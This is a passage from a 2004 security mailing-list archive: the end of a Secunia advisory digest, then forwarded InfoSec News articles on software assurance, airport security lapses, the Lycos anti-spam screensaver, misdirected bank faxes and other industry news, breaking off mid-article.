Exposure of sensitive information Released: 2004-12-02 SUSE has issued an update for the kernel. This fixes multiple vulnerabilities, which potentially can be exploited by malicious, local users to gain escalated privileges or by malicious people to cause a DoS (Denial of Service) or leak kernel memory. Full Advisory: http://secunia.com/advisories/13339/ -- [SA13336] Fedora update for samba Critical: Moderately critical Where: From local network Impact: DoS, System access Released: 2004-11-30 Fedora has issued an update for samba. This fixes two vulnerabilities, which can be exploited by malicious users to cause a DoS (Denial of Service) or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13336/ -- [SA13313] Debian update for yardradius Critical: Moderately critical Where: From local network Impact: System access Released: 2004-11-26 Debian has issued an updated for yardradius. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13313/ -- [SA13312] YardRadius "process_menu()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From local network Impact: System access Released: 2004-11-26 Max Vozeler has reported a vulnerability in YardRadius, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13312/ -- [SA13354] Fedora update for iptables Critical: Less critical Where: From remote Impact: Released: 2004-12-02 Fedora has issued an update for iptables. This fixes a security issue, where iptables under some circumstances fails to load required modules. Full Advisory: http://secunia.com/advisories/13354/ -- [SA13326] Gentoo update for opendchub Critical: Less critical Where: From remote Impact: System access Released: 2004-11-29 Gentoo has issued an update for opendchub. This fixes a vulnerability, which can be exploited by certain malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13326/ -- [SA13325] Open DC Hub "RedirectAll" Buffer Overflow Vulnerability Critical: Less critical Where: From remote Impact: System access Released: 2004-11-29 Donato Ferrante has reported a vulnerability in Open DC Hub, which can be exploited by certain malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13325/ -- [SA13324] Gentoo update for phpwebsite Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2004-11-29 Gentoo has issued an update for phpwebsite. This fixes a vulnerability, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/13324/ -- [SA13322] Gentoo update for phpmyadmin Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2004-11-29 Gentoo has issued an update for phpmyadmin. This fixes some vulnerabilities, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/13322/ -- [SA13343] Debian update for openssl Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-02 Debian has issued an update for openssl. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/13343/ -- [SA13340] Sun Solaris ping Utility Privilege Escalation Vulnerability Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-01 A vulnerability has been reported in Sun Solaris, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/13340/ -- [SA13316] Mandrake update for a2ps Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-11-26 MandrakeSoft has issued an update for a2ps. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/13316/ -- [SA13314] Mandrake update for zip Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-11-26 MandrakeSoft has issued an update for zip. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/13314/ -- [SA13308] Linux Kernel Local DoS and Memory Content Disclosure Vulnerabilities Critical: Less critical Where: Local system Impact: Exposure of sensitive information, DoS Released: 2004-11-25 Two vulnerabilities have been reported in the Linux Kernel, which can be exploited by malicious, local users to cause a DoS (Denial of Service) or gain knowledge of potentially sensitive information. Full Advisory: http://secunia.com/advisories/13308/ Other: Cross Platform:-- [SA13327] Orbz Password Field Buffer Overflow Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2004-11-30 Luigi Auriemma has reported a vulnerability in Orbz, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13327/ -- [SA13331] FreeImage Library Interleaved Bitmap Image Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2004-11-30 A vulnerability has been reported in FreeImage, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a user's system. Full Advisory: http://secunia.com/advisories/13331/ -- [SA13329] Nuked-Klan "Links" Module Script Insertion Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2004-11-29 XioNoX has reported a vulnerability in Nuked-Klan, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/13329/ -- [SA13319] YaBB Unspecified "shadow" Tags Script Insertion Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2004-11-26 A vulnerability has been reported in YaBB, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/13319/ -- [SA13321] Groupmax World Wide Web Cross-Site Scripting and Directory Traversal Critical: Less critical Where: From remote Impact: Cross Site Scripting, Exposure of sensitive information Released: 2004-11-29 Two vulnerabilities have been reported in Groupmax World Wide Web and Groupmax World Wide Web Desktop, which can be exploited to conduct cross-site scripting attacks or access arbitrary HTML files. Full Advisory: http://secunia.com/advisories/13321/ -- [SA13330] IberAgents Clear Text User Credential Disclosure Critical: Less critical Where: Local system Impact: Exposure of sensitive information Released: 2004-11-29 A security issue has been reported in IberAgents, which can be exploited by malicious, local users to gain knowledge of sensitive information. Full Advisory: http://secunia.com/advisories/13330/ ======================================================================== Secunia recommends that you verify all advisories you receive, by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Subscribe: http://secunia.com/secunia_weekly_summary/ Contact details: Web : http://secunia.com/ E-mail : support@secunia.com Tel : +45 70 20 51 44 Fax : +45 70 20 51 45 ======================================================================== From isn at c4i.org Fri Dec 3 04:40:34 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 3 04:53:08 2004 Subject: [ISN] Former cybersecurity czar: Code-checking tools needed Message-ID: http://www.computerworld.com/securitytopics/security/story/0,10801,97988,00.html By Grant Gross DECEMBER 02, 2004 IDG NEWS SERVICE WASHINGTON -- Software vendors need automated tools that look for bugs in their code, but it may be a decade before many of those tools are mature and widely used, said the former director of cybersecurity for the U.S. Department of Homeland Security. Creating software assurance tools was one long-term focus of the DHS National Cybersecurity Division during Amit Yoran's tenure there, Yoran said today during the E-Gov Institute Homeland Security and Information Assurance Conferences in Washington. About 95% of software bugs come from 19 "common, well-understood" programming mistakes, Yoran said, and his division pushed for automation tools that comb software code for those mistakes. "Today's developers ... oftentimes don't have the academic discipline of software engineering and software development and training around what characteristics would create flaws in the program or lead to bugs," Yoran said. Government research into some such tools is in its infancy, however, he added. "This cycle will take years if not decades to complete," he said. "We're realistically a decade or longer away from the fruits of these efforts in software assurance." Yoran, who resigned from his DHS position in September after being on the job for a year, hinted at why he left, but sidestepped a question about the reasons. In the private sector, he had a "real objective" on how to move forward, he said. "When you move into a strategic and somewhat ill-defined role of 'protect cyberspace,' that's a very difficult mission to get your arms around," he said. "You show up to work on a Monday morning, you're ready to put your fingers to the keyboard, you've got a team of folks working with you, what do you do ... to secure cyberspace from within the Department of Homeland Security?" Most Internet resources are owned by the private sector, and the U.S. government has been hesitant to pass cybersecurity mandates, noted Yoran, former vice president of worldwide managed security services at Symantec Corp. With no operational or regulatory control over most of the Internet, the goal of securing cyberspace at DHS was difficult, he said. Asked if that lack of authority was a reason for leaving the post, Yoran said his successor will need to "look at go-forward issues" in cybersecurity that the division can best address. Yoran, however, defended President George W. Bush's National Strategy to Secure Cyberspace, released in February 2003. The strategy, which sets out five major cybersecurity recommendations, did not advocate regulation, and the White House took the right approach in developing those recommendations by consulting with private industry, Yoran said. "As the Department of Homeland Security ... implementing the national strategy is not our job; it's not our responsibility," he said. "It's the nation's job, it's the international technology community's job and responsibility. We can just help." The national strategy and efforts at DHS can help move cybersecurity efforts beyond the current "cat and mouse game" of finding vulnerabilities, assessing whether to patch them, and patching them when the problems become painful to companies, Yoran said. He predicted a "radical transformation" in the cybersecurity field within two to four years as more companies and government agencies accept technologies such as Web services, remote Internet access and RFID (radio frequency identification) tags. "In the next two to three years, you won't be able to define where your network begins and ends," Yoran said. "The paradigms we rely on today for protecting our information -- stronger firewalls, more accurate intrusion detection -- those types of technologies will be required, but they will be solving an increasingly small percentage of the challenges that are going to be facing us." From isn at c4i.org Fri Dec 3 04:40:22 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 3 04:53:10 2004 Subject: [ISN] Heathrow Security Scare Message-ID: Forwarded from: William Knowles http://www.sky.com/skynews/article/0,,30000-1162666,00.html December 03, 2004 Sky News has uncovered major security lapses at Heathrow airport after an undercover reporter repeatedly gained access to restricted areas. Airport offices and out-of-bounds airside areas were easily breached, forcing bosses to review procedures. An undercover Sky News reporter highlighted how easy it was to walk into British Airways offices containing confidential security documents. He also managed to walk by passenger planes just hours before they were due to take off. BA has launched an investigation following the report, while the British Airports Authority (BAA), owner of Heathrow, admitted "there was room for improvement". The reporter returned to the airport on a number of occasions at night and carrying only a broom managed to escape the attention of security. Only once was he challenged, but even then staff did not ask for security credentials and he was allowed to carry on. He found a BA office unlocked and inside key manuals detailing the airline's security procedures. It detailed how staff are supposed to respond to bomb threats, how they are vetted before joining, and procedures for negotiating with hijackers. On another occasion the reporter broke through what should have been a watertight cordon keeping the public away from restricted areas of the airport. From the public viewing platform on top of Terminal 2 he found a gap in razorwire and slipped through. Once down on to the ground, he walked for 15 minutes unchecked and unnoticed around airliners that later would be filled with passengers. A BAA spokesman said: "Safety and security are the top priorities at Heathrow. "We are constantly seeking ways to maintain an effective barrier between the landside and airside parts of the airport, and to remain alert to any potential vulnerabilities. "On the basis of the information provided by Sky News, it would appear that there is room for improvement in this particular area of the airport and we have already taken steps to address that." And BA also said it would take action. A statement said: "Safety and security are always our top priorities and we are extremely concerned to hear that an undercover reporter has taken some documents and a high visibility vest from one of our landside offices within Terminal 1 at London Heathrow. "We have launched our own immediate investigation into the allegations made against the airline to ensure that appropriate action is taken to avoid this happening again." *==============================================================* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen Alfred. M. Gray, USMC ---------------------------------------------------------------- C4I.org - Computer Security, & Intelligence - http://www.c4i.org *==============================================================* From isn at c4i.org Fri Dec 3 04:40:46 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 3 04:53:11 2004 Subject: [ISN] Antispam screensaver downs two sites in China Message-ID: http://news.zdnet.com/2100-1009_22-5474963.html By Dan Ilett ZDNet (UK) December 2, 2004 Lycos Europe's "Make love not spam" campaign has killed access to some of the Web sites of its target alleged spammers, Netcraft has found. According to the Internet traffic monitoring company, Lycos Europe has successfully taken two Web sites hosted in China offline. The sites are bokwhdok.com and printmediaprofits.biz, according to a posting on Netcraft's Web site, dated this week. "A distributed denial-of-service (DDoS) attack launched by users of Lycos Europe's MakeLoveNotSpam.com screensaver has succeeded in crippling several spammer sites, but some of the targeted sites remain available," the posting said. Lycos Europe was unavailable for comment on the matter, but the company said on Tuesday it was not carrying out DDoS attacks, just slowing the bandwidth of its targets. It added that it had no intention of taking Web sites offline. "I have to be very clear that it's not a denial-of-service attack," Malte Pollmann, director of communications services for Lycos, said on Tuesday. "We slow the remaining bandwidth to 5 percent. It wouldn't be in our interests to (carry out DDoS attacks). It is to increase the cost of spamming. We have an interest to make this, economically, unattractive." Lycos Europe is a separate company from the Web portal that bears the Lycos name in the United States. It claims that it maintains roughly 40 million e-mail accounts in eight European countries. The "Make love not spam" screensaver site appeared to have been taken down by its operators on Wednesday. It now shows a graphic and the words "Stay tuned." On Tuesday, the Web portal denied claims that it had been hit by hacker attacks, saying a reported defacement of the "Make love not spam" Web site was a hoax. But Netcraft, among others, reported that the Web site was unavailable at several intervals that day. Lycos Europe launched its antispam campaign earlier this week, offering users a screensaver that uses the idle processing power of their computers to slow down bandwidth that connects to spammers' Web sites. Steve Linford, director of international spam-fighting organization Spamhaus, said on Tuesday that by attacking spammers' bandwidth, the portal could be attacking innocent users' bandwidth. From isn at c4i.org Fri Dec 3 04:41:03 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 3 04:53:13 2004 Subject: [ISN] You're faxing my what, where? Message-ID: http://www.canada.com/technology/story.html?id=abe9da66-e9cf-4f5e-9828-d97611c5a234 Jim Middlemiss Financial Post December 2, 2004 Businesses can avoid potential public relations and legal nightmares by developing privacy policies, authentication processes and using cutting-edge technology. The Canadian Imperial Bank of Commerce learned this the hard way last week when U.S. scrapyard operator Wade Peer went public with his story about how one of Canada's largest banks was flooding his fax machine with highly confidential information about its clients for the past three years. The faxes, he said, contained social insurance numbers, bank accounts and client signatures, and despite repeated calls from him they just kept piling up. Finally he sued CIBC to make them stop. The problem appears to stem from the fact Mr. Peer's toll-free number for his autoparts business, which he was forced to close, is similar to that of one of the bank's processing centres. After the story appeared in the press, the bank issued a cease-and-desist order to employees across the country, prohibiting them from sending internal faxes containing client information. Instead, they were advised to use the internal courier system or pick up a phone and engage in an old-fashioned conversation. In a statement CIBC said for the long-term "we are exploring other potential secure technological alternatives for the timely transmission of confidential information between branches and processing centres." Legislators and governments at the provincial and federal level have identified this problem and passed a range of laws requiring companies to take better care of sensitive employee and client information in their possession. Claudiu Popa, president of Informatica, a Toronto-based information security firm, says in addition to financial penalties and lawsuits for damages, "your name is going to get dragged in the news. Embarrassment is one of the biggest fears of companies today." In addition to faxes, misdirected voice mails, improperly addressed e-mails and improperly accessed documents all pose a problem when it comes to protecting confidential data. While it's virtually impossible to eliminate the problem, there are steps companies can take to reduce it, security experts say. The key is developing a solid set of privacy policies and authentication processes coupled with cutting-edge technologies, says John Weigelt, chief security advisor at Microsoft Canada. "They [businesses] have to establish principles to secure their environment." That includes restricting access to information and examining "each layer of defence." FAX FIXES When it comes to faxing large volumes of information, Alan Gahtan, an information technology lawyer in Toronto, says "I think there are some policies and procedures a company can enact to reduce this kind of [risk]." First, he says, "you want to reduce the amount of information." Don't send social insurance numbers, for example. Instead, deposit a master file with the office you are sending the information to and link to that list through the use of names. If a business has a large volume of faxes going one place, the most obvious solution is using speed dial. That eliminates user error as long as the number is correctly imput the first time and it you check regularly to ensure it has not been changed. But why even send faxes in an era of digital information? asks Informatica's Mr. Popa. "Faxes are outdated. Faxes are not secure. Most organizations should preserve documents digitally." If a business has a lot of data flowing to a single place, it could implement a virtual private network, a secure direct pipeline. In the case of computer networks, a scanner can be used to digitize information programmed to be sent to another printer's Internet Protocol address. By digitizing the information, it can be subject to encryption and the use of digital certificates, which prohibit unauthorized users from accessing or reading a confidential document, he says. Faxing documents that require a signature can be eliminated with the use of electronic signatures and basic encryption functions such as s/mime (secure/multipurpose Internet mail extensions), which lets the recipient verify who the information is from and access it only if they have the correct digital certificate on their computer. VOICE MAIL PROBLEMS If a caller phones the wrong number and leaves a message, there is little that can be done to retrieve it, Mr. Gahtan says. A policy should be in place preventing staff from leaving confidential information on a voice mail. Also, voice mail requires a PIN number to access messages, which opens doors to hackers. The redial function on some phones recalls the last numbers dialled, including a PIN. Mr. Gahtan says he makes it a practice of calling another number after accessing his voice mail to ensure his number is bounced from the redial list. ENDING E-MAIL ERRORS Besides the possibility of typing in the wrong address or name in the directory, users should avoid the user-group function, Mr. Gahtan says, because often the sender is not sure whose names are in the group. "Secure messaging and rights management becomes important" when e-mails and computer networks are involved, Mr. Weigelt says. Technologies can be deployed to control and monitor access to documents within an organization. When sending documents outside, encryption is the key to ensuring unwelcome eyes don't view them. Ben Sapiro, an independent IT security consultant in Toronto, says monitoring and controlling access to documents online is critical. Firms need to use server audit tools better to control who is accessing which documents. Proxy servers can inspect traffic going across the network and monitor it. Alerts can be set to advise appropriate managers if someone is trying to access documents that they are not entitled to see. LOCKING DOWN EXTERNAL RELATIONS Businesses also need to be aware of the pitfalls in sending confidential data to third parties. Mr. Weigelt suggests putting agreements in place to ensure information is safeguarded. Mr. Gahtan says: "You want your supplier to agree to conform to some minimum security practices." Those practices should also apply to subcontractors. As well, prohibit information from going offshore, where privacy standards may be lax. Also, include indemnity provisions so if something bad happens and your business faces a financial penalty or hardship, then the party that caused the problem reimburses you. From isn at c4i.org Mon Dec 6 04:27:48 2004 From: isn at c4i.org (InfoSec News) Date: Mon Dec 6 05:21:29 2004 Subject: [ISN] India to work jointly with Russia to tackle cyber crime Message-ID: http://www.hindustantimes.com/news/181_1136746,0003.htm Press Trust of India Bangalore December 4, 2004 India's Cyber Emergency Response Team (CERT) plans to jointly work with Russia to combat cyber crime, including virus and hacker attacks in their computer networks, a top IT department official said on Saturday. "We are trying to see how best our CERT can work with Russian authorities on Information Security and prevent attacks by virus, worms and hackers," Union IT Department Joint Secretary Madhavan Nambiar said in Bangalore. Delivering his address at the Indo-Russian Information and Communication Technologies Cooperation Conference in Bangalore, Nambiar said the cyber security plan was in the early stages, but CERT had already signed a protocol on e-security with Russia. He said the three areas of cooperation in the IT domain were software parks, Information Security and Software services. The Software Technology Parks of India (STPI) was in the process of setting up a software park in Moscow, Nambiar said. Russian IT Minister Leonid D Reiman invited Indian software service firms to leverage the engineering talent in his country to export software to Europe and the United States. "We want to retain talent within Russia and Indian companies can work on projects in our country for customers in third countries like Europe and America," he said. Reiman said the Russian IT industry team, which has joined President Vladimir Putin's delegation, was keen to learn about the success of India in the software sector and replicate it in their country. From isn at c4i.org Mon Dec 6 04:26:27 2004 From: isn at c4i.org (InfoSec News) Date: Mon Dec 6 05:21:31 2004 Subject: [ISN] Secrecy News -- 12/03/04 Message-ID: ---------- Forwarded message ---------- Date: Fri, 3 Dec 2004 08:46:03 -0500 From: "Aftergood, Steven" To: secrecy_news@lists.fas.org Subject: Secrecy News -- 12/03/04 SECRECY NEWS from the FAS Project on Government Secrecy Volume 2004, Issue No. 107 December 3, 2004 ** HOMELAND SECRECY ** FLYING BLIND: THE DECLINE OF SCIENCE POLICY ADVICE ** WHITE HOUSE PANEL CRITICIZES CYBERSECURITY OVERCLASSIFICATION ** SCIENCE AND TECHNOLOGY IN THE 108TH CONGRESS (CRS) ** THE CLASSIFIED SILEX URANIUM ENRICHMENT PROJECT ** CIA YIELDS TO SOUTH KOREA IN SPELLING DISPUTE [...] WHITE HOUSE PANEL CRITICIZES CYBERSECURITY OVERCLASSIFICATION Sometimes the act of classifying scientific or technical information can diminish national security instead of enhancing it. Last month, a White House panel concluded that the growing classification of government research on computer security is not serving the nation well because it renders such research inaccessible outside of narrow military and intelligence channels. "Classified cybersecurity R&D is, of course, needed for numerous purposes," observed F. Thomson Leighton, chair of the cybersecurity subcommittee of the President's Information Technology Advisory Committee. "However, classified work tends not to benefit generic cybersecurity products--which are used throughout society (including the military and intelligence communities)," he said at a meeting last month. In the future, he said, the government should "favor unclassified basic research" in cybersecurity. Leighton's speech was first reported in the newsletter Inside the Pentagon on November 25. See "White House Panel Blasts Pentagon's Cybersecurity R&D Policies" by John T. Bennett, Inside the Pentagon, reposted with permission and with a link to the underlying presentation here: http://www.fas.org/sgp/news/2004/11/itp112504.html [...] _______________________________________________ Secrecy News is written by Steven Aftergood and published by the Federation of American Scientists. To SUBSCRIBE to Secrecy News, send email to secrecy_news-request@lists.fas.org with "subscribe" in the body of the message. To UNSUBSCRIBE, send a blank email message to secrecy_news-remove@lists.fas.org OR email your request to saftergood@fas.org Secrecy News is archived at: http://www.fas.org/sgp/news/secrecy/index.html Secrecy News has an RSS feed at: http://www.fas.org/sgp/news/secrecy/index.rss _______________________ Steven Aftergood Project on Government Secrecy Federation of American Scientists web: www.fas.org/sgp/index.html email: saftergood@fas.org voice: (202) 454-4691 From isn at c4i.org Mon Dec 6 04:26:10 2004 From: isn at c4i.org (InfoSec News) Date: Mon Dec 6 05:21:32 2004 Subject: [ISN] [infowarrior] - mi2g: Welcome to the FUD Factory Message-ID: Forwarded from: Richard Forno mi2g: Welcome to the FUD Factory Richard Forno / www.infowarrior.org #2004-12 Copyright ? 2004 by Author. Permission granted to reproduce with credit. Source URL: http://www.infowarrior.org/articles/2004-12.html - - - - - Everyone's favorite FUD Factory -- "security intelligence" company mi2g -- is at it again. This week, the firm posted a "news alert" sensationally entitled 'The rise of corporate hate sites - lies, damned lies and extortion'. While the topic of "corporate hate sites" is an interesting and even relevant one for today's day and age, it appears that the true goal of this mi2g "news alert" was to attack security pundit Rob Rosenberger's website Vmyths.Com for his analysis and commentary about security-related companies, including mi2g. (For those unaware, Rob is one of the few pundits who calls things as he sees them, and, while refreshing, that sometimes runs contrary to what companies want the public to know.) It's pathetic, if not somewhat amusing, to see mi2g stooping to such desperate levels that it feels obligated to apply the "hate site" moniker to a website that disagrees with its corporate views....however, for a firm that thrives on the development, packaging, marketing, and sales of hysteria, misdirection, selective analysis, and the continuing propagation of Fear, Uncertainty, and Doubt (FUD), this is simply business-as-usual. At least Rosenberger publicly cites his sources and cross-checks his facts. For example, one glaring omission in this report is that while mi2g claims a growth in the number of "corporate hate sites" on the Internet, its report does not account for the explosive growth of websites of all sorts during that time (including, quite logically, "corporate hate sites") -- meaning that mi2g's scary statistics on the this allegedly-new "digital risk" are valid only within the vacuum that they're presented. Caveat reader! You can read the report if you like, but I'll save you some time -- according to mi2g, the real enemy in cyberspace isn't hackers, it's people whose opinions you disagree with. And that's quite evident when reading mi2g's statement: in its 14 paragraphs, there are 6 dedicated to attacking and attempting to discredit Rosenberger and Vmyths while implicitly begging the public for sympathy. Six out of 14. My proprietary BESPOAKE? analysis shows that to be almost half of the entire document -- with that much attention, one would think mi2g wants to portray Rosenberger as the Fourth Horseman of the Internet. As I wrote back in 2002, let's not forget that mi2g started off as an e-business enabler focused on operating portal sites (such as Carlounge.Com and Lawlounge.Com) under the corporate motto "Bringing The Web To The World." Suddenly, in 1999 with the digital apocalypse of Y2K looming ahead, the firm morphed into an internet security company that "by integrating state-of-the-art software engineering technology with super computing capability is revolutionising the world of eCommerce and for the first time maximising the return from the internet whilst minimising the risk." From cars to cyberterrorism in only a few short years. PT Barnum would be proud. (Perhaps mi2g's new corporate motto should be "Bringing FUD to The World One News Release at a Time.") Is mi2g so insecure with its public perception that it had to concoct and sensationally-hype an ominous-sounding "digital risk" in order to justify its attack on a respected website expressing an opinion and asking legitimate-but-still-unanswered questions about its services? You tell me -- but keep in mind this is the same "security intelligence" company now declaring that the greatest cyber-danger these days isn't hackers, technical vulnerabilities, exploitable software, or human complacency but rather independent thinking and holding companies accountable for their statements and services. My sources tell me that mi2g soon will announce it has reason to believe that Saddam Hussein's missing WMD are stockpiled in Rosenberger's Texas basement because it rained in London today. Damn that Rosenberger - is there anything he can't do? mi2g's statement: http://www.mi2g.com/cgi/mi2g/press/021204.php More info on mi2g and its history: http://www.infowarrior.org/articles/2002-12.html http://vmyths.com/resource.cfm?id=64&page=1 http://www.attrition.org/errata/charlatan.html You are a subscribed member of the infowarrior list. Visit www.infowarrior.org for list information or to unsubscribe. This message may be redistributed freely in its entirety. Any and all copyrights appearing in list messages are maintained by their respective owners. From isn at c4i.org Mon Dec 6 04:28:00 2004 From: isn at c4i.org (InfoSec News) Date: Mon Dec 6 05:21:34 2004 Subject: [ISN] Reformed Welsh hacker returns to computer crime Message-ID: http://www.pingwales.co.uk/security/welsh-hacker-returns.html By Robert Andrews 03 December 2004 The Welsh hacker whose escapades sparked panic about a potential World War III has returned to computer crime, planning a Hollywood-style heist to steal a valuable painting. But Mathew Bevan's latest electronic raid won't attract the long arm of the law - it's just an experiment staged for a television show due to be screened in December. Bevan won notoriety 10 years ago when he was arrested on suspicion of breaching and downloading data from US military computer networks in an effort to uncover evidence of a UFO conspiracy. Aged 21, he was charged with conspiracy after allegedly entering the secret Air Force Research Laboratory system in New York using a rudimentary PC in the back bedroom of his parents' Ely, Cardiff, bungalow. A British court later acquitted him after prosecutors abandoned their case and Bevan, whose hacker alias was "Kuji", renounced hacking to become a respected computer security consultant. He has now been enlisted to join a crack team of five reformed criminal masterminds set the challenge of using their underworld expertise to pull off high-profile thefts for The Heist, a three-part Channel 4 series starting Tuesday, December 7, at 9pm. In the show, the Welshman teams up with arch villains like armed robber Terry Smith, who once escaped from his jail term, and Joey Pyle, a former gangster and friend of the Krays. "Basically, a group of experts is brought together and set a task of performing a robbery under strict conditions, as real-life as possible," said Bevan, now 31, who studied computing at the University of Wales Institute, Cardiff, and is originally from the Llandaf area of the city. "Each episode covers a different robbery or task and, in each, I am the technology guru or hacker, monitoring and advising each step of the way. "No real criminals who intend to pull off these kinds of heists would actually employ hacker skills to get the job done. The only hacker skills used are my brains. "It's very similar to performing penetration exercises, only the top brass know what's going on, so essentially it is a real-life test of the organisation. There's nothing like a bit of James Bond!" But Bevan, who will appear on Richard & Judy ahead of the first episode, sets his own brush with the law apart from those of the ex-con colleagues on his team. "I never threatened or hurt anyone with my actions," he said. "Everything I did was on a computer screen from my bedroom; some of the other guys were a little more forceful with their actions. It becomes clear that I have a completely different way of looking at things than the others. "Victims" in each of the three shows approved the simulated attacks, welcoming the test of their own security. In the first episode, the team is given four days to steal a painting, The View From The Bandstand by UK artist Andrew Gifford, whilst on display during the London Art Fair at the Business Design Centre. Bevan is on board to scope out weaknesses in the electronic systems of a building regarded as impregnable. In subsequent shows, he uses his keyboard skills to attempt to smuggle a ?1m car overseas and to kidnap a prize racehorse. "He's the only one of the ex-criminals in the series who hasn't been convicted," said a Channel 4 spokesperson. In his March 1994 hack - which has become part of internet folklore - Bevan, who is from the Ely area of the capital and has explained he turned to hacking at school to escape bullying, was also said to have mounted attacks on Nasa, Nato and Pentagon computers. Pursued by both Scotland Yard and the FBI, the case produced a hailstorm of hype from news media revelling in computer crime stories - normally the attention hackers crave, until they find themselves in the dock. Though reports claimed the Pentagon regarded Bevan as the number one threat to US security, many of the headlines focused on accomplice Richard Pryce's transfer of a database from a Korean nuclear laboratory computer to the New York machine, which sparked fears of an atomic spat between America and North Korea until it was discovered the lab had, in fact, been in South Korea. Pryce pleaded guilty and was fined ?1,200. Following his acquittal at Woolwich Crown Court in November 1997, Bevan reformed and became a so-called "white hat" - a talented hacker who turns his skills to benevolent or commercial use like auditing security systems for a price. Operating under the name Kujimedia, he has since worked as a consultant for the likes of Nintendo and now lives in Wiltshire, from where he advises leading brands on design, viral marketing and online strategies. From isn at c4i.org Mon Dec 6 04:27:22 2004 From: isn at c4i.org (InfoSec News) Date: Mon Dec 6 05:21:36 2004 Subject: [ISN] Q&A: ISS exec on security threat prevention Message-ID: http://www.computerworld.com/securitytopics/security/story/0,10801,98047,00.html By Jaikumar Vijayan DECEMBER 03, 2004 COMPUTERWORLD Security architectures that are designed solely to react to threats instead of preventing them in the first place are doomed to fail in a world of fast-evolving and self-propagating threats, says Tom Noonan, CEO of Atlanta-based Internet Security Systems Inc. What do you see as some of the big trends in the security market? This whole notion of reaction in terms of how our systems have been built is running out of steam. Preemption is going to be a very, very fundamental theme in the direction which security is taking. The concept of preemption basically addresses the question of why not avoid a threat or detect it and prevent it rather than react to it. If you look at the traditional security model, all of our technologies have been built as an ad hoc response to a new threat. Fifteen years ago, the only threat was floppy-transported viruses, so the solution was PC-based antivirus. When the threat became unauthorized access, we built firewalls; when it was spam, we built antispam; when it became spyware, we built antispyware tools; and when it is malicious content, we built content security tools. This entire industry has been built in an ad hoc, reactive manner. The technologies that lie underneath are all signature-based, and you cannot have a signature until you have an active threat. That was fine in a disconnected world. When you mention "signature-based technologies," are you referring specifically to antivirus tools? I'm talking about a signature that uniquely identifies a threat by name. Most intrusion-detection systems, most antivirus products, spam, spyware and content-security systems effectively work this way. So how does being preemptive help? Today, time and again, you see the devastating and pervasive impact of highly effective, self-propagating viruses and worms because the vast majority of businesses are dependent on multiple layers of reactive technology. Businesses are suffering daily from this reactive model. They have added every layer of protection they can, and they are still being compromised. The highly effective, self-propagating nature of Internet threats today forces companies into a reactive posture, and that is inefficient. The threat has scaled the control systems that are in place. When you talk about being more proactive, it's not only technology we are talking about, right? We are talking about technology and also about architecture. We are already seeing a pretty dramatic shift in security architectures on the Net. We are talking about management, which is very, very different in a preemptive world. We are talking about a dramatically different economic model in terms of the cost structure and clearly we are talking about different processes internally. What shift are you seeing in security architectures? A move away from point products toward platforms. The disaggregated, multiple layers are going away because the responsibility for making all that stuff work together has been thrust upon the unknowing IT department. The reality is that a whole bunch of acquired products marketed under the same brand, or the same bunch of products marketed under different brands, have never been built as a system or as a platform for security -- only as independent point capabilities to detect a threat. You also mentioned a shift in security economics. Since 2001, security budgets have been increasing on an average of 15% to 20% a year. That is totally unsustainable. No aspect of your cost structure can possibly sustain that kind of growth rate in a competitive global economic environment. CEOs and CFOs are forcing CIOs to be more efficient, not just with capital purchases but with the cost of labor itself. The economic shift in moving toward a platform is pretty significant. Platforms are built to be enterprisewide, meaning they are built and integrated to operate as one system from a vendor. What kind of products or services are you delivering to help your customers address these trends? If you look at our company, most people recognize us as the inventor of intrusion-detection systems and vulnerability-detection systems. >From the start, the vision of this company was to build what we call the universal protection agent. We believed that threats would evolve, as would vulnerabilities, and they would continually change. Building any system that was threat-specific was fundamentally wrong to the long-term scale model. So this whole concept of preemption really began years ago with our vision of building a highly scalable enterprise system that could detect, analyze and prevent any kind of threats against vulnerable pieces of the infrastructure. Instead of focusing primarily on the threat, we are focusing on the vulnerabilities. Because we understand that vulnerability, we can protect against it. From isn at c4i.org Mon Dec 6 04:27:37 2004 From: isn at c4i.org (InfoSec News) Date: Mon Dec 6 05:21:38 2004 Subject: [ISN] The Hidden Risks of Demo Discs Message-ID: http://www.eweek.com/article2/0,1759,1735655,00.asp By Libe Goad December 3, 2004 In mid-November, members of Sony's PlayStation Underground received the Holiday Demo Disk and discovered that after executing one of 